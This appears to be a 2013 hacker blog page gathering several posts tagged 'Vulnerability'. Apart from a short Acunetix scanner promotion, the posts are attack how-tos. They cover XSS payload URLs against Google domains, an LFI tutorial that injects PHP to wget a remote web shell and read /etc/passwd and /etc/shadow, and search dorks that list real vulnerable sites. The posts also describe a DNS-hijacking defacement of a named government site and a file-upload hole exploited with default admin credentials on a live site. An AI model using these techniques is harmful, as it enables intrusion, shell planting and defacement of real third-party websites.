About Author
DJ Alone is a Blogger , Penetration Tester, Ethical Hacker.
Showing posts with label Vulnerability. Show all posts
Showing posts with label Vulnerability. Show all posts
Wednesday, February 6, 2013
What Is Acunetix ?
Hi Guys...This is DJ Alone...Today I Was Just Checking My Friend's Site...and Found Lot Of Vulnerabilities In It...How To Check Ur Website is Vulnerable Or Not... So Let's See How What It Can Do For Us ?
What Is Vulnerability ?
In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance...
Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw... To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface...
What Is Acunetix ?
Acunetix is a Vulnerability scanner That Helps U To Find Vulnerability In Ur Site... It Is A Most Used Tool...By Using Acunetix U Can Easily Find Vulnerabilites In Ur Site...U Can Easily Fix Errors & Secure Ur Website Easily...
Is Your WebSite Vulnerable ?
Easily Scan Your Website For
What Is Vulnerability ?
In computer security, a vulnerability is a weakness which allows an attacker to reduce a system's information assurance...
Vulnerability is the intersection of three elements: a system susceptibility or flaw, attacker access to the flaw, and attacker capability to exploit the flaw... To exploit a vulnerability, an attacker must have at least one applicable tool or technique that can connect to a system weakness. In this frame, vulnerability is also known as the attack surface...
What Is Acunetix ?
Acunetix is a Vulnerability scanner That Helps U To Find Vulnerability In Ur Site... It Is A Most Used Tool...By Using Acunetix U Can Easily Find Vulnerabilites In Ur Site...U Can Easily Fix Errors & Secure Ur Website Easily...
Is Your WebSite Vulnerable ?
- 70% of all cyber-attacks target web applications
- Make sure your website isn't vulnerable to web attacks
- Check if it is with Acunetix WVS
- SQL Injection
- Cross-Site Scripting
- Other vulnerabilities
- PCI DSS Data
- OWASP Top 10 Vulnerabilities
- HIPAA Compliance Reports
- HTTP Editor
- Sniffer
- Fuzzer
- and more...
Scan Web 2.0 Applications
- State of the art CSA engine
- Comprehensive scan of latest web technologies
In Next Post I Will Post The Link Of Acunetix For My Readers...
Friday, January 18, 2013
Google Website's Vulnerabilities Unfixed Till Now
Note : Xss will work in Mozilla Firefox only ...
1 : Cross site scripting Vulnerability in Google.com
Domain : http://www.google.com
Title : iGoogle
Vuln Type : Xss
Author : Yash and Code injector
Status : Unfixed
Link : http://www.google.com/ig/directory?url=www.01fes.com/x.xml
2 : Open redirect Vulnerability in Google.com
Domain : wap.google.com
Title : google for smartphones
Vuln Type : Open Redirect
Author : Minhal Mehdi
Status : Unfixed
Link : http://wap.google.com/search?btnI&q=site:http://www.devilscafe.in/
3 : Xss Vulnerability in Google Apis
Domain : googleapis.com
Title : Google API
Vuln Type : XSS
Author : d3v1l
Status : Unfixed
Link : http://commondatastorage.googleapis.com/chromium-browser-continuous/index.html?path=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
http://chromium-browser-symbols.commondatastorage.googleapis.com/index.html?path=%22%3E%3Cscript%3Ealert('XSS')%3C/script%3E
if you have any new Vulnerability then you can sumbit it to Google & Earn Money From It...
Credits To :- DevilsCafe.In
Tuesday, January 8, 2013
Hacking Websites via LFI (Simple, Short and easy)
1. Introduction
2. /proc/self /environ
3. PHP injection
4. Accessing the shell
1. Introduction
Remember LFI? This is a tutorial on how to get the shell on the website with a site vulnerable to LFI.
Here is the example of a code that is vulnerable to LFI:
<?php
// LFI Vulnerable Code
$redirect = $_GET[redirect];
include($redirect);
?>
It is vulnerable because $redirect is not sanitized, therefor include($redirect); will read off $_GET[page];.
Here is a example of LFI on Unix (very old):
http://www.example.com/redirect.php?.../../etc/passwd (Unix)
http://www.example.com/redirect.php?.../../etc/shadow (Linux)
http://www.example.com/redirect.php?.../master.passwd (FreeBSD)
2. proc/self/environ
To check if it is vulnerable, we enter this in the ../ part:
../../../../../proc/sef/environ
If you get something like DOCUMENT_ROOT=SKDOISAJUF()&@#%(#*%, etc... That means it is vulnerable.
If you get only a blank page, it isn't vulnerable.
3. PHP Injection
Now, let's access it and use Tamper Data to change the user agent to this:
<?system('wget http://gonullyourself.org/shell.txt -O gonullyourself.php');?>
Now, submit the request.
Our command will be executed.
4. Accessing the shell
To check if the command got executed, we will enter something like this:
http://www.google.ca/gonullyourself.php
If our shell is there, the command was successfully executed.
Easy :) Isn't it?
Monday, January 7, 2013
Simple Machines Forum 2.0.3 Path Disclosure
*Summary:*
--------------
A security flaw allows an attacker to know the full path of the web system.
*Details:
-----------
*SSI.php Line 294:
// Fetch a post with a particular ID. By default will only show if you have
permission to the see the board in question - this can be overriden.
function ssi_fetchPosts($post_ids, $override_permissions = false,
$output_method = 'echo')
{
$post_id is not defined. Possible fix: ($post_id = false)
*PoC:
-------
*http://example.com/forumpath/SSI.php?ssi_function=fetchPosts
*Google Dorks:
---------------------
*inurl:?index.php?action=help
*Demos:
-----------
*http://simpleportal.net/SSI.php?ssi_function=fetchPosts
http://www.furgovw.org/SSI.php?ssi_function=fetchPosts
http://www.teachmideast.com/forum_old/SSI.php?ssi_function=fetchPosts
http://www.slowracing.com/jaxfox/SSI.php?ssi_function=fetchPosts
http://www.iptv2you.com/board/SSI.php?ssi_function=fetchPosts
http://voceteopr.com/SSI.php?ssi_function=fetchPosts
http://www.thesilverball.com/SSI.php?ssi_function=fetchPosts
http://othforums.com/SSI.php?ssi_function=fetchPosts
http://www.skinmod.eu/SSI.php?ssi_function=fetchPosts
Sunday, January 6, 2013
000webhost DNS Hijacking Vulnerablity
So let see the DNS Hijacking Vulnerablity making Thousends of Websites hosted on 000webhost and other free hosting webhosting Proivders.
Step 1 : signup for a account on 000webhost.com
it will give you a address like abcd.something.com
for example mine was : http://testingfu.comule.com
Now Goto cPanel
and Look for IP Adress, you'll get something like "31.170.163.140"
Now Goto Bing .com and type dork ip:31.170.163.140
if you want .gov .edu or any other particular domain then dork will " ip:31.170.163.140 .gov "
or " ip:31.170.163.140 .edu "
all server ips
Server 1 with 253 ips
31.170.161.1 - 31.170.161.253
Server 2 with with 253 ips
31.170.162.1 - 31.170.162.253
Server 3 with 242 ips
31.170.163.1 - 31.170.163.241
Now come to Search Results
i got The Target csirt.gov.bd
i just open this url :
abcd.csirt.gov.bd
and here a error page of 000webhost...
which shows that the dns is configured so that the site is forwarded to Nameserver of 000webhost
now what i did is enter in my cpanel which i created at 000webhost and park a subdomain :
men.csirt.gov.bd
bd.csirt.gov.bd
and done added a deface page to public_html
and the website defaced...
Some of the sites for example which are vulnreable for this attack....
Credits Goes To :- Devils Cafe
"file viewer" remote File upload vulnerability
for shell
Dork : "file viewer for
and "File viewer for Uploader (c) 2003 by Dirk Paehl"Goto Google or any other search engine and type the dork ""file viewer for uploader" now select site from there, vulnerable website's title will be something like "File viewer for Uploader"
after clicking on site you'll get site url like this :
http://www.site.com/view.php
or http://www.site.com/directory/view.php
now replace view.php with upload.php and you'll get upload options there !
in some sites it will ask for Name n Password
default password for these websites is Admin
Name = Adminnow select your files and upload !
Password= admin
to view your uploaded files goto the 1st view.php and check files's directory there, now click on your file !
Live Demo :
uploader : http://www.ldcc.net.au/upload.php
Result : http://www.ldcc.net.au/uploaden/i2.html
Credit Goes To :- Devils Cafe
Subscribe to:
Posts (Atom)
